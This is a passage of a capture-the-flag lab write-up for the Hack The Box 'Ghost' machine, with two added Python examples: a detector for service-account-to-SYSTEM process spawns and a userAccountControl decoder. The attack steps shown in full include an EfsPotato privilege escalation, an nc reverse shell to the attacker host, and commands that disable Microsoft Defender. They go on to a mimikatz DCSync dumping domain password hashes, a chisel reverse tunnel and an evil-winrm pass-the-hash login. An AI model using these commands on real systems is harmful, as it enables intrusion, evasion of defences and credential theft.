EfsPotato
As discovered previously, the mssqlserver account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the potato family of token-impersonation exploits. Given that the PRIMARY virtual host is a fairly new system, I will be using EfsPotato, which leverages the efsrpc pipe via MS-EFSR.
Exploit
The exploit repo can be found online.
I could technically use SweetPotato, a collection of potato exploits that includes EfsPotato, but given that the binary is fairly large and AV is present, I will opt for a simpler method.
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ git clone https://github.com/zcgonvh/EfsPotato
Cloning into 'EfsPotato'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 7 (delta 1), pack-reused 0
Receiving objects: 100% (28/28), 73.30 KiB | 1.56 MiB/s, done.
Resolving deltas: 100% (7/7), done.
Cloning the repository to Kali.
Exploitation
PS C:\tmp> curl http://10.10.14.61/EfsPotato/EfsPotato.cs -o C:\tmp\EfsPotato.cs
Transferring the source code of the exploit.
PS C:\tmp> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
I will compile it locally using csc.exe
PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2024 10:37 AM 25441 EfsPotato.cs
-a---- 7/16/2024 10:43 AM 17920 EfsPotato.exe
There is the compiled binary, EfsPotato.exe.
PS C:\tmp> .\EfsPotato.exe
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
usage: EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
There are 5 different pipes to leverage. All of them would likely work, since they are all up by default.
PS C:\tmp> .\EfsPotato.exe whoami efsrpc
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\efsrpc
[!] binding ok (handle=6734a0)
[+] Get Token: 884
[!] process with pid: 3372 created.
==============================
nt authority\system
Code execution as NT AUTHORITY\SYSTEM confirmed.
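What the run above leaves behind for a defender is a process-creation event in which a child running as SYSTEM has a parent running as a plain service account (here NT Service\MSSQLSERVER). The following detection heuristic is an added example, not part of the writeup; the records are constructed and modelled on Sysmon Event ID 1 fields (User, ParentUser, Image, ParentImage), and the PIDs other than 3372 are made up.

```python
# Added example (not from the writeup): flag process-creation events in which a
# service account spawns a child that runs as SYSTEM, the pattern that a
# token-impersonation "potato" leaves behind. Records are constructed and
# modelled on Sysmon Event ID 1 fields (User, ParentUser, Image, ParentImage).
from dataclasses import dataclass

SYSTEM = "nt authority\\system"


@dataclass(frozen=True)
class ProcessCreate:
    pid: int
    image: str
    user: str
    parent_pid: int
    parent_image: str
    parent_user: str


def is_service_account(user: str) -> bool:
    """Virtual service accounts (NT Service\\X) and IIS application pools."""
    u = user.lower()
    return u.startswith("nt service\\") or u.startswith("iis apppool\\")


def find_token_escalations(events):
    """Return events where a service-account parent created a SYSTEM child.
    Legitimate service code very rarely spawns SYSTEM children, so each hit
    deserves a look at the parent binary (here an unsigned EXE in C:\\tmp)."""
    return [e for e in events
            if e.user.lower() == SYSTEM and is_service_account(e.parent_user)]


# Constructed sample mirroring the writeup's run: the MSSQLSERVER-owned
# EfsPotato.exe (pid 4488, made up) creates whoami.exe (pid 3372) as SYSTEM.
SAMPLE_EVENTS = [
    ProcessCreate(3372, r"C:\Windows\System32\whoami.exe", SYSTEM,
                  4488, r"C:\tmp\EfsPotato.exe", r"NT Service\MSSQLSERVER"),
    ProcessCreate(4488, r"C:\tmp\EfsPotato.exe", r"NT Service\MSSQLSERVER",
                  1560, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  r"NT Service\MSSQLSERVER"),
    # benign: services.exe (SYSTEM) starting a service host (SYSTEM)
    ProcessCreate(1600, r"C:\Windows\System32\svchost.exe", SYSTEM,
                  700, r"C:\Windows\System32\services.exe", SYSTEM),
]

if __name__ == "__main__":
    for hit in find_token_escalations(SAMPLE_EVENTS):
        print(f"[!] pid {hit.pid} {hit.image} runs as SYSTEM; "
              f"parent {hit.parent_image} ({hit.parent_user})")
```

Only the whoami.exe event is reported: its parent is owned by the MSSQLSERVER virtual account, whereas the svchost.exe event is SYSTEM spawning SYSTEM and is ignored.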
PS C:\tmp> .\EfsPotato.exe "C:\tmp\nc.exe 10.10.14.61 3333 -e powershell" efsrpc
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\efsrpc
[!] binding ok (handle=ededa0)
[+] Get Token: 884
[!] process with pid: 1920 created.
==============================
Executing reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 3333
listening on [any] 3333 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 56808
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\tmp> whoami
whoami
nt authority\system
PS C:\tmp> hostname
hostname
PRIMARY
PS C:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.254
System-level compromise on the PRIMARY host.
Hashdump
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\> Set-MpPreference -DisableIOAVProtection $true
PS C:\> Set-MpPreference -DisableScriptScanning 1
AV disarmed
PS C:\tmp> curl http://10.10.14.61/mimikatz.exe -o C:\tmp\mimikatz.exe
Transferring mimikatz
PS C:\tmp> .\mimikatz.exe "lsadump::dcsync /dc:primary.corp.ghost.htb /domain:CORP.GHOST.HTB /all /csv exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /dc:primary.corp.ghost.htb /domain:CORP.GHOST.HTB /all /csv exit
[DC] 'CORP.GHOST.HTB' will be the domain
[DC] 'primary.corp.ghost.htb' will be the DC server
[DC] Exporting domain 'CORP.GHOST.HTB'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 69eb46aa347a8c68edb99be2725403ab 514
1103 GHOST$ dae1ad83e2af14a379017f244a2f5297 2080
500 Administrator 41515af3ada195029708a53d941ab751 512
1000 PRIMARY$ 27f92da5e3d79962020ddebc08ed7d70 532480
Dumping hashes
Since the current PowerShell session is unstable, I will switch to tunneling.
Tunneling
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ chisel server -p 55555 --reverse -v
2024/07/18 20:06:39 server: Reverse tunnelling enabled
2024/07/18 20:06:39 server: Fingerprint +R2znUFgeImf1ve50KHtDRdQR4RcwTX2rvufrDjWkTE=
2024/07/18 20:06:39 server: Listening on http://0.0.0.0:55555
PS C:\tmp> curl http://10.10.14.61/chiselx64.exe -o .\chiselx64.exe
PS C:\tmp> Start-Process cmd.exe -ArgumentList "/c C:\tmp\chiselx64.exe client 10.10.14.75:55555 R:48823:socks"
Tunnel created
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ proxychains4 -q evil-winrm -i 127.0.0.1 -u administrator -H 41515af3ada195029708a53d941ab751
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ghost-corp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
PRIMARY
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.254
PowerShell session re-established via evil-winrm. This is also for the purpose of safe file transfer.
PRIMARY
*Evil-WinRM* PS C:\tmp> Get-ADUser -FIlter *
DistinguishedName : CN=Administrator,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : c5e3525b-fe09-4833-8077-3daa57ab4ea7
SamAccountName : Administrator
SID : S-1-5-21-2034262909-2733679486-179904498-500
Surname :
UserPrincipalName :
DistinguishedName : CN=Guest,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : d3dbe70d-cfa9-4d5c-b0d5-664ef60b08d1
SamAccountName : Guest
SID : S-1-5-21-2034262909-2733679486-179904498-501
Surname :
UserPrincipalName :
DistinguishedName : CN=krbtgt,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 7db0ab63-3f15-4c39-a523-98816907eaff
SamAccountName : krbtgt
SID : S-1-5-21-2034262909-2733679486-179904498-502
Surname :
UserPrincipalName :
DistinguishedName : CN=GHOST$,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : True
GivenName :
Name : GHOST$
ObjectClass : user
ObjectGUID : 6a5c624b-27e1-4e81-8e84-e0c7fc05657f
SamAccountName : GHOST$
SID : S-1-5-21-2034262909-2733679486-179904498-1103
Surname :
UserPrincipalName :
Listing all the AD users in the current domain (CORP.GHOST.HTB), the PRIMARY$ account is nowhere to be found.
However, there is an interesting account: GHOST$.
PRIMARY$
*Evil-WinRM* PS C:\tmp> Get-ADUser PRIMARY$
Get-ADUser : Cannot find an object with identity: 'PRIMARY$' under: 'DC=corp,DC=ghost,DC=htb'.
At line:1 char:1
+ Get-ADUser PRIMARY$
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (PRIMARY$:ADUser) [Get-ADUser], ADIdentityNotFoundException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException,Microsoft.ActiveDirectory.Management.Commands.GetADUser
*Evil-WinRM* PS C:\tmp> Get-ADComputer PRIMARY$ -Properties *
AccountExpirationDate :
accountExpires : 9223372036854775807
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 0
badPasswordTime : 0
badPwdCount : 0
CannotChangePassword : False
CanonicalName : corp.ghost.htb/Domain Controllers/PRIMARY
Certificates : {}
CN : PRIMARY
codePage : 0
CompoundIdentitySupported : {False}
countryCode : 0
Created : 1/31/2024 6:34:00 PM
createTimeStamp : 1/31/2024 6:34:00 PM
Deleted :
Description :
DisplayName :
DistinguishedName : CN=PRIMARY,OU=Domain Controllers,DC=corp,DC=ghost,DC=htb
DNSHostName : PRIMARY.corp.ghost.htb
DoesNotRequirePreAuth : False
dSCorePropagationData : {1/31/2024 6:34:01 PM, 12/31/1600 4:00:01 PM}
Enabled : True
HomedirRequired : False
HomePage :
instanceType : 4
IPv4Address : 10.0.0.10
IPv6Address : ::1
isCriticalSystemObject : True
isDeleted :
KerberosEncryptionType : {RC4, AES128, AES256}
LastBadPasswordAttempt :
LastKnownParent :
lastLogoff : 0
lastLogon : 133656371495722858
LastLogonDate : 7/16/2024 1:49:07 PM
lastLogonTimestamp : 133656365478037323
localPolicyFlags : 0
Location :
LockedOut : False
logonCount : 113
ManagedBy :
MemberOf : {}
MNSLogonAccount : False
Modified : 7/16/2024 1:49:07 PM
modifyTimeStamp : 7/16/2024 1:49:07 PM
msDFSR-ComputerReferenceBL : {CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=corp,DC=ghost,DC=htb}
msDS-GenerationId : {74, 131, 42, 8...}
msDS-SupportedEncryptionTypes : 28
msDS-User-Account-Control-Computed : 0
Name : PRIMARY
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Computer,CN=Schema,CN=Configuration,DC=ghost,DC=htb
ObjectClass : computer
ObjectGUID : 12591b27-1b8c-48a1-b436-4f1e0f6c712e
objectSid : S-1-5-21-2034262909-2733679486-179904498-1000
OperatingSystem : Windows Server 2022 Datacenter
OperatingSystemHotfix :
OperatingSystemServicePack :
OperatingSystemVersion : 10.0 (20348)
PasswordExpired : False
PasswordLastSet : 6/17/2024 9:51:07 AM
PasswordNeverExpires : False
PasswordNotRequired : False
PrimaryGroup : CN=Domain Controllers,CN=Users,DC=corp,DC=ghost,DC=htb
primaryGroupID : 516
PrincipalsAllowedToDelegateToAccount : {}
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133631166674475283
rIDSetReferences : {CN=RID Set,CN=PRIMARY,OU=Domain Controllers,DC=corp,DC=ghost,DC=htb}
SamAccountName : PRIMARY$
sAMAccountType : 805306369
sDRightsEffective : 15
serverReferenceBL : {CN=PRIMARY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ghost,DC=htb}
ServiceAccount : {}
servicePrincipalName : {ldap/PRIMARY.corp.ghost.htb/DomainDnsZones.corp.ghost.htb,
ldap/PRIMARY.corp.ghost.htb/ForestDnsZones.ghost.htb,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/PRIMARY.corp.ghost.htb,
TERMSRV/PRIMARY...}
ServicePrincipalNames : {ldap/PRIMARY.corp.ghost.htb/DomainDnsZones.corp.ghost.htb,
ldap/PRIMARY.corp.ghost.htb/ForestDnsZones.ghost.htb,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/PRIMARY.corp.ghost.htb,
TERMSRV/PRIMARY...}
SID : S-1-5-21-2034262909-2733679486-179904498-1000
SIDHistory : {}
TrustedForDelegation : True
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 532480
userCertificate : {}
UserPrincipalName :
uSNChanged : 131114
uSNCreated : 12293
whenChanged : 7/16/2024 1:49:07 PM
whenCreated : 1/31/2024 6:34:00 PM
That's because PRIMARY$ is a machine account.
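The last column of the dcsync CSV output and the userAccountControl attribute in Get-ADComputer carry the same bitmask, and decoding it shows why Get-ADUser cannot find PRIMARY$ while Get-ADComputer can. The decoder below is an added example, not part of the writeup; the flag names and bit values are Microsoft's documented userAccountControl constants, and the rows are the RID, name and UAC value taken from the dcsync output above.

```python
# Added example (not part of the writeup): decode the userAccountControl values
# that appear as the last column of the dcsync CSV output and in Get-ADComputer.
# Flag names and bit values are the documented Microsoft userAccountControl bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}


def decode_uac(value: int) -> list[str]:
    """Return the names of all flags set in a userAccountControl value."""
    names = [name for bit, name in UAC_FLAGS.items() if value & bit]
    leftover = value & ~sum(UAC_FLAGS)  # bits this table does not know
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:x})")
    return names


def account_kind(value: int) -> str:
    """Classify an account the way AD does: the *_TRUST_ACCOUNT bits mark
    computer and trust objects, which is why Get-ADUser cannot find PRIMARY$."""
    if value & 0x2000:
        return "domain controller (machine account)"
    if value & 0x1000:
        return "member computer (machine account)"
    if value & 0x0800:
        return "inter-domain trust account"
    if value & 0x0200:
        return "user"
    return "unknown"


# Rows from the writeup's dcsync output: RID, sAMAccountName, userAccountControl
DCSYNC_ROWS = [
    (502, "krbtgt", 514),
    (1103, "GHOST$", 2080),
    (500, "Administrator", 512),
    (1000, "PRIMARY$", 532480),
]

if __name__ == "__main__":
    for rid, name, uac in DCSYNC_ROWS:
        print(f"{rid:>5} {name:<14} {uac:>7}  {account_kind(uac):<36} "
              f"{', '.join(decode_uac(uac))}")
```

PRIMARY$ (532480) decodes to SERVER_TRUST_ACCOUNT plus TRUSTED_FOR_DELEGATION, matching the TrustedForDelegation and Domain Controllers primary group shown by Get-ADComputer, and GHOST$ (2080) carries INTERDOMAIN_TRUST_ACCOUNT, so it is a trust account rather than an ordinary computer or user.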